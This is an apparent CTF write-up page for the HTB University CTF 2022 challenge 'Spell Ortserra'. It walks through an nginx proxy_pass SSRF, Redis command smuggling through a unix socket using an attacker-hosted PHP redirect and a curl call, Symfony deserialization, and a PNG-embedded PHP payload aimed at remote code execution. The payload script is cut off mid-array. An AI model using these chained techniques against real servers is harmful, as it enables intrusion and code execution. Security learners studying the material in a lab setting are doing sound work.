<!DOCTYPE HTML>
<html>
<head>
  <meta charset="utf-8">
  <meta http-equiv="pragma" content="no-cache">
  <meta http-equiv="cache-control" content="no-cache">
  <meta http-equiv="expires" content="0">
  
  <title>[HTB University CTF 2022] Spell Ortserra - Worty | Hexagon</title>
  <meta name="author" content="22sh">
  
  <meta name="description" content="TL;DRIn this challenge, we are given all the source code of the application as well as the configuration files (nginx, docker, …) allowing to deploy it locally.
The organization of the project is in this form:

So we are dealing with a symfony environment (recognized by the presence of a composer.json and a .env file). Before going to look at the source code of the application and play with PHP, we will take a look at the configuration files. Indeed, in the configuration files, we can notice several things:

readflag : The binary will fetch the flag in &amp;#x2F;root, so we will absolutely need an RCE
redis.conf : There is a redis service, we will probably have to get an SSRF to interact with it
nginx.conf &amp;#x2F; proxy.conf : A reverse proxy has been set up on the application">
  
  
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">

  <meta property="og:title" content="[HTB University CTF 2022] Spell Ortserra - Worty"/>
  <meta property="og:site_name" content="Hexagon"/>

  
    <meta property="og:image" content=""/>
  

  
  
    <link href="/favicon.png" rel="icon">
  
  
  <link rel="stylesheet" href="/css/bootstrap.min.css" media="screen" type="text/css">
  <link rel="stylesheet" href="/css/font-awesome.css" media="screen" type="text/css">
  <link rel="stylesheet" href="/css/style.css" media="screen" type="text/css">
  <link rel="stylesheet" href="/css/responsive.css" media="screen" type="text/css">
  <link rel="stylesheet" href="/css/highlight.css" media="screen" type="text/css">
  <link rel="stylesheet" href="/css/google-fonts.css" media="screen" type="text/css">
  <!--[if lt IE 9]><script src="//html5shiv.googlecode.com/svn/trunk/html5.js"></script><![endif]-->

  <script src="/js/jquery-2.0.3.min.js"></script>

  <!-- analytics -->
  
<script>
  (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
  (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
  m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
  })(window,document,'script','//www.google-analytics.com/analytics.js','ga');
  ga('create', 'UA-70812759-1', 'auto');
  ga('send', 'pageview');
</script>



<script>
var _hmt = _hmt || [];
(function() {
  var hm = document.createElement("script");
  hm.src = "//hm.baidu.com/hm.js?cb5448498d7169c668b07c2b255d62c1";
  var s = document.getElementsByTagName("script")[0]; 
  s.parentNode.insertBefore(hm, s);
})();
</script>


<meta name="generator" content="Hexo 6.3.0"></head>

 <body>  
  <nav id="main-nav" class="navbar navbar-inverse navbar-fixed-top" role="navigation">
    <div class="container">
      <button type="button" class="navbar-header navbar-toggle" data-toggle="collapse" data-target=".navbar-collapse">
		<span class="sr-only">Toggle navigation</span>
        <span class="icon-bar"></span>
        <span class="icon-bar"></span>
        <span class="icon-bar"></span>
      </button>
	  <a class="navbar-brand" href="/">Hexagon</a>
      <div class="collapse navbar-collapse nav-menu">
		<ul class="nav navbar-nav">
		  
		  <li>
			<a href="/blog" title="CTFs and other stuffs">
			  <i class="fa fa-archive"></i>Blog
			</a>
		  </li>
		  
		  <li>
			<a href="/hof" title="Hall of Fame">
			  <i class="fa fa-trophy"></i>Hall of Fame
			</a>
		  </li>
		  
		  <li>
			<a href="/members" title="About us">
			  <i class="fa fa-user"></i>Members
			</a>
		  </li>
		  
		</ul>
      </div>
    </div> <!-- container -->
</nav>
<div class="clearfix"></div>

  <div class="container">
  	<div class="content">
    	 


	
		<div class="page-header">
			<h1> [HTB University CTF 2022] Spell Ortserra - Worty</h1>
		</div>
	



<div class="row post">
	<!-- cols -->
	
	<div id="top_meta"></div>
	<div class="col-md-9">
	

	<!-- content -->
	<div class="mypage">		
	  		

	  <h2 id="TL-DR"><a href="#TL-DR" class="headerlink" title="TL;DR"></a>TL;DR</h2><p>In this challenge, we are given all the source code of the application as well as the configuration files (nginx, docker, …) allowing to deploy it locally.</p>
<p>The organization of the project is in this form:</p>
<p><img src="/images/1.png" alt="project"></p>
<p>So we are dealing with a symfony environment (recognized by the presence of a <code>composer.json</code> and a <code>.env</code> file). Before going to look at the source code of the application and play with PHP, we will take a look at the configuration files. Indeed, in the configuration files, we can notice several things:</p>
<ul>
<li><code>readflag</code> : The binary will fetch the flag in &#x2F;root, so we will absolutely need an RCE</li>
<li><code>redis.conf</code> : There is a redis service, we will probably have to get an SSRF to interact with it</li>
<li><code>nginx.conf</code> &#x2F; <code>proxy.conf</code> : A reverse proxy has been set up on the application</li>
</ul>
<span id="more"></span>
<p><img src="/images/2.jpg" alt="meme"></p>
<p>In the redis configuration, we can note the following lines that are not common:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">unixsocket /run/redis/redis.sock</span><br><span class="line">unixsocketperm 775</span><br></pre></td></tr></table></figure>

<p>The redis socket is thus exposed inside the docker, allowing to interact directly with it.</p>
<p>In the nginx configuration, we can note the following two blocks that are not common:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><span class="line">location ~ /assets/(.+)/ &#123;</span><br><span class="line">    rewrite ^/assets/(.+)$ /$1 break;</span><br><span class="line"></span><br><span class="line">    resolver 1.1.1.1 ipv6=off valid=30s;</span><br><span class="line">    proxy_set_header Accept-Encoding &quot;&quot;;</span><br><span class="line">    proxy_pass http://$1;</span><br><span class="line">    proxy_set_header User-Agent &quot;Mozilla/5.0 (Windows NT 10.0; WOW64; rv:37.0) Gecko/20100101 Firefox/37.0&quot;;</span><br><span class="line"></span><br><span class="line">    proxy_intercept_errors on;</span><br><span class="line">    error_page 301 302 307 = @handle_redirects;</span><br><span class="line"></span><br><span class="line">    sub_filter_once off;</span><br><span class="line">    sub_filter_types text/css;</span><br><span class="line">    sub_filter &quot;http://$1&quot; &quot;/assets/$1&quot;;</span><br><span class="line">    sub_filter &quot;https://$1&quot; &quot;/assets/$1&quot;;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">location @handle_redirects &#123;</span><br><span class="line">    resolver 1.1.1.1 ipv6=off valid=30s;</span><br><span class="line"></span><br><span class="line">    set $original_uri $uri;</span><br><span class="line">    add_header X-original-uri $original_uri;</span><br><span class="line">    set $orig_loc $upstream_http_location;</span><br><span class="line"></span><br><span class="line">    proxy_pass $orig_loc;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>In the <code>location ~ /assets/(.+)/</code> directive, there is a first vulnerability: <code>proxy_pass http://$1;</code>, in fact, this directive means that what is passed to the <code>(.+)</code> regex will be used by nginx as a proxy, so it allows to get directly an SSRF ! So we can directly test :</p>
<p><img src="/images/3.png" alt="ssrf"></p>
<p>Here, we can see that when we pass <code>127.0.0.1:80</code> in the directive, it returns the web page ! So let’s try to get the redis instance directly !</p>
<p><img src="/images/4.png" alt="redis_fail"></p>
<p><img src="/images/5.jpg" alt="meme2"></p>
<p>Since version 3.7 of redis, the developers have added a security, indeed, if the redis instance, in the request sees the strings <code>POST</code> or <code>Host:</code>, it will interrupt the connection:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">10:M 05 Dec 2022 09:23:24.251 - Accepted 127.0.0.1:49606</span><br><span class="line">10:M 05 Dec 2022 09:23:24.251 # Possible SECURITY ATTACK detected. It looks like somebody is sending POST or Host: commands to Redis. This is likely due to an attacker attempting to use Cross Protocol Scripting to compromise your Redis instance. Connection aborted.</span><br></pre></td></tr></table></figure>

<p>So we won’t be able to use the SSRF directly on the redis instance. If we go back to the nginx configuration, we can notice another interesting directive: <code>error_page 301 302 307 = @handle_redirects;</code>, that means that if a web instance responds with a redirection code, it will be up to the <code>handle_redirects</code> block to handle the rest.</p>
<p>In this block we control more things: </p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">set $orig_loc $upstream_http_location;</span><br><span class="line">proxy_pass $orig_loc;</span><br></pre></td></tr></table></figure>

<p>If we look at the <code>proxy_pass</code> directive of nginx, we learn that it is possible to interact directly with unix sockets! And this is very interesting, since the configuration of redis has been done in such a way that the redis socket is exposed in the docker! The syntax to do this is quite special: <code>http://unix:/&lt;path to socket&gt;</code>. </p>
<p>Since we are going to interact with the socket, we will have to see what happens when we try to connect to it, for this I will use the socat binary as a TCP proxy:</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">cd</span> /var/run/redis/</span><br><span class="line"><span class="built_in">mv</span> redis.sock redis.sock.original</span><br><span class="line">socat -t100 -x -v UNIX-LISTEN:/var/run/redis/redis.sock,mode=777,reuseaddr,fork UNIX-CONNECT:/var/run/redis/redis.sock.original</span><br></pre></td></tr></table></figure>

<p>On an external server, we can create the following PHP script to exploit the vulnerable nginx configuration:</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="title function_ invoke__">header</span>(<span class="string">&quot;HTTP/1.1 302&quot;</span>);</span><br><span class="line"><span class="title function_ invoke__">header</span>(<span class="string">&quot;Location: http://unix:/var/run/redis/redis.sock&quot;</span>);</span><br></pre></td></tr></table></figure>

<p>On our socat proxy, we can see the connection being made:</p>
<p><img src="/images/6.png" alt="socat"></p>
<p>Now that we can communicate with the socket, we will try to find a way to send arbitrary commands to redis. In the communication, we can see that the header “Host: “ is on the second line, so we’ll have to find a way to send our command on the first line. In the nginx configuration, we notice that in no case it specifies a list of authorized HTTP methods, so we can send any HTTP verb, nginx will accept it.</p>
<p>Moreover, when we answer in our <code>Location</code> header with a link to the unix socket, it is possible to specify a path on which the socket will interact: <code>http://unix:/var/run/redis/redis.sock:/test</code>, if we send the request back, we observe the following behavior:</p>
<p><img src="/images/7.png" alt="socat2"></p>
<p>Here we have a very interesting behavior, indeed, we control both the http method, but also what is passed behind, so we can send any redis command here since we are before the presence of the header “Host:”!</p>
<p>One last thing to fix is the presence of the string “HTTP&#x2F;1.0”, in fact, redis will trigger an error every time since it will be taken as a parameter of the command that we will pass. To overcome this problem, we will use the “EVAL” command of redis, which allows to execute LUA (in a sandbox).</p>
<p>The format of the commands that we will send will be :</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&quot;redis.call(&lt;what we want&gt;); return ARGV[1]; &quot; 0</span><br></pre></td></tr></table></figure>

<p>This returns ARGV[1], i.e. <code>HTTP/1.0</code>, so we can now test by trying to create a key “a” with the content “a”, so we modify our PHP script:</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="title function_ invoke__">header</span>(<span class="string">&quot;HTTP/1.1 302&quot;</span>);</span><br><span class="line"><span class="title function_ invoke__">header</span>(<span class="string">&#x27;Location: http://unix:/var/run/redis/redis.sock:&quot;redis.call(\&#x27;SET\&#x27;,\&#x27;a\&#x27;,\&#x27;a\&#x27;); return ARGV[1];&quot; 0 &#x27;</span>);</span><br></pre></td></tr></table></figure>

<p>To send our orders, we will use the following bash command:</p>
<figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">curl -X EVAL http://localhost:1337/assets/146.59.156.82:80/</span><br></pre></td></tr></table></figure>

<p>And…. tadam:</p>
<p><img src="/images/8.png" alt="arbitrarycommand"></p>
<p><img src="/images/9.jpg" alt="meme3"></p>
<p>So now we have a way to write arbitrary data in the redis instance of the application! So now we have to play with the web application to see how we can use this to get an RCE.</p>
<p>To connect on the application, the credentials are by default, <code>admin:admin</code>, and we arrive on a kind of game :</p>
<p><img src="/images/10.png" alt="siteweb"></p>
<p>When we click on a point, we can take control of it by specifying our email address, and that’s all, there is no other functionality on the application. So we are going to look at the code to see what happens when we “take control” of a point on the map:</p>
<ul>
<li>Dans le fichier “AdminController.php”:<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">subscribe</span>(<span class="params">Request <span class="variable">$request</span>, ManagerRegistry <span class="variable">$doctrine</span>, MessageBusInterface <span class="variable">$bus</span></span>)</span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">[...]</span><br><span class="line">    <span class="variable">$subscribeNotification</span> = <span class="keyword">new</span> <span class="title class_">SubscribeNotification</span>(</span><br><span class="line">        <span class="variable">$subscribe</span>-&gt;email,</span><br><span class="line">        <span class="variable">$subscribe</span>-&gt;uuid,</span><br><span class="line">        <span class="variable">$tracker</span>-&gt;<span class="title function_ invoke__">getXCoordinate</span>(),</span><br><span class="line">        <span class="variable">$tracker</span>-&gt;<span class="title function_ invoke__">getYCoordinate</span>()</span><br><span class="line">    );</span><br><span class="line">    <span class="variable">$bus</span>-&gt;<span class="title function_ invoke__">dispatch</span>(<span class="variable">$subscribeNotification</span>);</span><br><span class="line">[...]</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li>
</ul>
<p>Here, we notice that we will create a <code>SubscribeNotification</code> object with the email specified by the user, the uuid of the point and its coordinates. If we create a point, we can notice this in the application logs:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">09:51:40 INFO      [messenger] Received message App\Message\SubscribeNotification [&quot;class&quot; =&gt; &quot;App\Message\SubscribeNotification&quot;]</span><br><span class="line">09:51:40 INFO      [messenger] Message App\Message\SubscribeNotification handled by App\MessageHandler\SubscribeNotificationHandler::__invoke [&quot;class&quot; =&gt; &quot;App\Message\SubscribeNotification&quot;,&quot;handler&quot; =&gt; &quot;App\MessageHandler\SubscribeNotificationHandler::__invoke&quot;]</span><br><span class="line">09:51:40 INFO      [messenger] App\Message\SubscribeNotification was handled successfully (acknowledging to transport). [&quot;class&quot; =&gt; &quot;App\Message\SubscribeNotification&quot;]</span><br></pre></td></tr></table></figure>

<p>In symfony, it’s possible to create “MessageHandler” which allow to listen on a certain class, and when this one is invoked (so created), then the code defined in “MessageHandler” is executed.<br>Moreover, in the application architecture, you may have seen (at the beginning) the file “worker.sh” :</p>
<figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#!/bin/ash</span></span><br><span class="line"></span><br><span class="line"><span class="built_in">chmod</span> 0700 /worker.sh</span><br><span class="line"></span><br><span class="line"><span class="keyword">while</span> <span class="literal">true</span>; <span class="keyword">do</span></span><br><span class="line">    php81 /www/bin/console messenger:consume SendMailTransport --time-limit=60 -vv</span><br><span class="line">    <span class="built_in">echo</span> <span class="string">&quot;DEL messages&quot;</span> | redis-cli</span><br><span class="line"><span class="keyword">done</span></span><br></pre></td></tr></table></figure>

<p>So we can use the <code>grep</code> command on <code>SendMailTransport</code> to see what it corresponds to:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">challenge/config/packages/messenger.yaml:            SendMailTransport: &quot;%env(MESSENGER_TRANSPORT_DSN)%&quot;</span><br><span class="line">challenge/config/packages/messenger.yaml:            &#x27;App\Message\SubscribeNotification&#x27;: SendMailTransport</span><br></pre></td></tr></table></figure>

<p>If we look in the .env file, the “MESSENGER_TRANSPORT_DSN” variable is initialized to <code>redis://localhost:6379/messages</code>.</p>
<p><img src="/images/11.jpg" alt="meme4"></p>
<p>So we can go back to redis to see what happens when we write to a point on the map. In the redis keys, we notice the presence of “messages”, this key is of type “STREAM”, to see what happens in it at the time of writing, we can use the following command: <code>XREAD BLOCK 0 STREAMS messages $</code> :</p>
<p><img src="/images/12.png" alt="serialization"></p>
<p>What a surprise! At the time of the message handling, a symfony serialized object is written in redis, allowing the application to send a mail. So we will have to exploit the application via this way, to get our remote code execution.</p>
<p>Before going to exploit the deserialization via redis, we will follow the following path:</p>
<ul>
<li>Modification of the direct PHP code with the values of the variables we want</li>
<li>Dump the serialization we want to send via the command <code>XREAD BLOCK 0 STREAMS messages $</code>.</li>
<li>Delete the added code and restart the application</li>
<li>Direct writing in redis of the payload recovered at step 2 via the XADD command</li>
<li>Restart the application and write the payload via the miconfiguration of nginx</li>
</ul>
<p>We don’t want to be able to use symfony’s gadget, indeed, the version of this one is too recent and no PoC is released yet. We notice the presence of the following class in the serialization : <code>ApplicationMessageSubscribeNotification</code>. This class does not contain much, except four attributes that we have already described above. So we’ll have to make a pop chain to call another class which is potentially vulnerable. After analysis of the files, we choose this one : <code>SubscribeNotificationHandler</code> :</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">SubscribeNotificationHandler</span> <span class="keyword">implements</span> <span class="title">MessageHandlerInterface</span></span></span><br><span class="line"><span class="class"></span>&#123;</span><br><span class="line">    [...]</span><br><span class="line">    <span class="keyword">public</span> <span class="variable">$export_file</span>;</span><br><span class="line">    [...]</span><br><span class="line">    <span class="keyword">public</span> <span class="variable">$map</span> = <span class="string">&#x27;http://localhost/static/images/clean_map.png&#x27;</span>;</span><br><span class="line">    <span class="keyword">public</span> <span class="variable">$stamp</span> = <span class="string">&#x27;http://localhost/static/images/stamp.png&#x27;</span>;</span><br><span class="line">    [...]</span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__destruct</span>(<span class="params"></span>)</span></span><br><span class="line"><span class="function">    </span>&#123;</span><br><span class="line">        <span class="variable">$exportMap</span> = <span class="keyword">new</span> <span class="title class_">MapExportService</span>(</span><br><span class="line">            <span class="variable language_">$this</span>-&gt;uuid,</span><br><span class="line">            <span class="variable language_">$this</span>-&gt;map,</span><br><span class="line">            <span class="variable language_">$this</span>-&gt;stamp,</span><br><span class="line">            <span class="variable language_">$this</span>-&gt;export_file,</span><br><span class="line">            <span class="variable language_">$this</span>-&gt;x_coordinate,</span><br><span class="line">            <span class="variable language_">$this</span>-&gt;y_coordinate</span><br><span class="line">        );</span><br><span class="line">    &#125;</span><br><span class="line">    [...]</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>In the following explanation, we will have to assume that with deserialization, we control all the parameters of the <code>SubscribeNotificationHandler</code> class, including <code>$map</code> and <code>$stamp</code>.</p>
<p>The fact that this code is in the magic function <code>__destruct</code> is convenient, because this method is called as soon as an object is destroyed, except that if we create one in our serialization, it will necessarily be destroyed afterwards, so this code will necessarily be called. We will now concentrate on the <code>MapExportService</code> class, and more particularly on the <code>generateMap()</code> method, since this is called by the <code>SubscribeNotificationHandler</code> class:</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br></pre></td><td class="code"><pre><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">MapExportService</span></span></span><br><span class="line"><span class="class"></span>&#123;</span><br><span class="line">    [...]</span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">generateMap</span>(<span class="params"></span>)</span></span><br><span class="line"><span class="function">    </span>&#123;</span><br><span class="line">        <span class="comment">// Fetch resources</span></span><br><span class="line">        <span class="variable">$mapFile</span> = <span class="variable language_">$this</span>-&gt;<span class="title function_ invoke__">fetch_image</span>(<span class="variable">$this</span>-&gt;map_url);</span><br><span class="line">        <span class="variable">$stampFile</span> = <span class="variable language_">$this</span>-&gt;<span class="title function_ invoke__">fetch_image</span>(<span class="variable">$this</span>-&gt;stamp_url);</span><br><span class="line"></span><br><span class="line">        <span class="keyword">if</span> (!<span class="variable language_">$this</span>-&gt;<span class="title function_ invoke__">is_image</span>(<span class="variable">$mapFile</span>) || !<span class="variable language_">$this</span>-&gt;<span class="title function_ invoke__">is_image</span>(<span class="variable">$stampFile</span>)) <span class="keyword">return</span> <span class="literal">false</span>;</span><br><span class="line"></span><br><span class="line">        <span class="comment">// Create Image instances</span></span><br><span class="line">        <span class="variable">$map</span> = <span class="title function_ invoke__">imagecreatefrompng</span>(<span class="variable">$mapFile</span>);</span><br><span class="line">        <span class="variable">$stamp</span> = <span class="title function_ invoke__">imagecreatefrompng</span>(<span class="variable">$stampFile</span>);</span><br><span class="line"></span><br><span class="line">        <span class="comment">// add stamp to the tracker coordinates</span></span><br><span class="line">        <span class="title function_ invoke__">imagecopymerge</span>(</span><br><span class="line">            <span class="variable">$map</span>,</span><br><span class="line">            <span class="variable">$stamp</span>,</span><br><span class="line">            <span class="variable">$this</span>-&gt;x_coordinate,</span><br><span class="line">            <span class="variable">$this</span>-&gt;y_coordinate,</span><br><span class="line">            <span class="number">0</span>,</span><br><span class="line">            <span class="number">0</span>,</span><br><span class="line">            <span class="title function_ invoke__">imagesx</span>(<span class="variable">$stamp</span>),</span><br><span class="line">            <span class="title function_ invoke__">imagesy</span>(<span class="variable">$stamp</span>),</span><br><span class="line">            <span class="number">100</span></span><br><span class="line">        );</span><br><span class="line"></span><br><span class="line">        <span class="comment">// create watermark with details</span></span><br><span class="line">        <span class="variable">$stamp</span> = <span class="title function_ invoke__">imagecreatetruecolor</span>(<span class="number">420</span>, <span class="number">115</span>);</span><br><span class="line"></span><br><span class="line">        <span class="title function_ invoke__">imagefilledrectangle</span>(<span class="variable">$stamp</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">419</span>, <span class="number">115</span>, <span class="number">0x0000FF</span>);</span><br><span class="line">        <span class="title function_ invoke__">imagefilledrectangle</span>(<span class="variable">$stamp</span>, <span class="number">9</span>, <span class="number">9</span>, <span class="number">410</span>, <span class="number">105</span>, <span class="number">0xFFFFFF</span>);</span><br><span class="line"></span><br><span class="line">        <span class="title function_ invoke__">imagestring</span>(<span class="variable">$stamp</span>, <span class="number">5</span>, <span class="number">20</span>, <span class="number">20</span>, <span class="string">&#x27;Track: &#x27;</span> . <span class="variable">$this</span>-&gt;uuid, <span class="number">0x0000FF</span>);</span><br><span class="line">        <span class="title function_ invoke__">imagestring</span>(<span class="variable">$stamp</span>, <span class="number">5</span>, <span class="number">20</span>, <span class="number">40</span>, <span class="string">&#x27;X-Coordinate: &#x27;</span> . <span class="variable">$this</span>-&gt;x_coordinate, <span class="number">0x0000FF</span>);</span><br><span class="line">        <span class="title function_ invoke__">imagestring</span>(<span class="variable">$stamp</span>, <span class="number">5</span>, <span class="number">20</span>, <span class="number">60</span>, <span class="string">&#x27;Y-Coordinate: &#x27;</span> . <span class="variable">$this</span>-&gt;y_coordinate, <span class="number">0x0000FF</span>);</span><br><span class="line">        <span class="title function_ invoke__">imagestring</span>(<span class="variable">$stamp</span>, <span class="number">5</span>, <span class="number">20</span>, <span class="number">80</span>, <span class="string">&#x27;Last Updated: &#x27;</span> . <span class="title function_ invoke__">date</span>(<span class="string">&quot;Y/m/d H:i:s&quot;</span>), <span class="number">0x0000FF</span>);</span><br><span class="line"></span><br><span class="line">        <span class="comment">// Set the margins for the stamp and get the height/width of the stamp image</span></span><br><span class="line">        <span class="variable">$marge_right</span> = <span class="number">10</span>;</span><br><span class="line">        <span class="variable">$marge_bottom</span> = <span class="number">10</span>;</span><br><span class="line">        <span class="variable">$sx</span> = <span class="title function_ invoke__">imagesx</span>(<span class="variable">$stamp</span>);</span><br><span class="line">        <span class="variable">$sy</span> = <span class="title function_ invoke__">imagesy</span>(<span class="variable">$stamp</span>);</span><br><span class="line"></span><br><span class="line">        <span class="comment">// Merge the stamp onto our map</span></span><br><span class="line">        <span class="title function_ invoke__">imagecopymerge</span>(<span class="variable">$map</span>, <span class="variable">$stamp</span>, <span class="title function_ invoke__">imagesx</span>(<span class="variable">$map</span>) - <span class="number">450</span>, <span class="number">10</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="title function_ invoke__">imagesx</span>(<span class="variable">$stamp</span>), <span class="title function_ invoke__">imagesy</span>(<span class="variable">$stamp</span>), <span class="number">50</span>);</span><br><span class="line"></span><br><span class="line">        <span class="comment">// Save exported map</span></span><br><span class="line">        <span class="variable">$savePath</span> = <span class="string">&#x27;/www/public/static/exports/&#x27;</span> . <span class="variable language_">$this</span>-&gt;export_file;</span><br><span class="line">        <span class="title function_ invoke__">imagepng</span>(<span class="variable">$map</span>, <span class="variable">$savePath</span>);</span><br><span class="line">    &#125;</span><br><span class="line">    [...]</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>This class will be used to get our remote code execution, as the last statement of the <code>generateMap()</code> function is <code>imagepng($map, $savePath);</code>, but we also control the <code>$this-&gt;export_file</code> variable as it is declared in the <code>SubscribeNotificationHandler</code> class.</p>
<p>Last but not least, this method does a lot of operations on the images it retrieves, which prevents us from using basic code execution techniques in the images (comments, …).<br>To achieve this, I used Synacktiv’s blog on <a target="_blank" rel="noopener" href="https://www.synacktiv.com/publications/persistent-php-payloads-in-pngs-how-to-inject-php-code-in-an-image-and-keep-it-there.html">images</a>, and in particular the “IDAT chunk” method, with the following script:</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"> </span><br><span class="line"><span class="title function_ invoke__">header</span>(<span class="string">&#x27;Content-Type: image/png&#x27;</span>);</span><br><span class="line"> </span><br><span class="line"><span class="variable">$p</span> = <span class="keyword">array</span>(<span class="number">0xA3</span>, <span class="number">0x9F</span>, <span class="number">0x67</span>, <span class="number">0xF7</span>, <span class="number">0x0E</span>, <span class="number">0x93</span>, <span class="number">0x1B</span>, <span class="number">0x23</span>, <span class="number">0xBE</span>, <span class="number">0x2C</span>, <span class="number">0x8A</span>, <span class="number">0xD0</span>, <span class="number">0x80</span>, <span class="number">0xF9</span>, <span class="number">0xE1</span>, <span class="number">0xAE</span>, <span class="number">0x22</span>, <span class="number">0xF6</span>, <span class="number">0xD9</span>, <span class="number">0x43</span>, <span class="number">0x5D</span>, <span class="number">0xFB</span>, <span class="number">0xAE</span>, <span class="number">0xCC</span>, <span class="number">0x5A</span>, <span class="number">0x01</span>, <span class="number">0xDC</span>, <span class="number">0xAA</span>, <span class="number">0x52</span>, <span class="number">0xD0</span>, <span class="number">0xB6</span>, <span class="number">0xEE</span>, <span class="number">0xBB</span>, <span class="number">0x3A</span>, <span class="number">0xCF</span>, <span class="number">0x93</span>, <span class="number">0xCE</span>, <span class="number">0xD2</span>, <span class="number">0x88</span>, <span 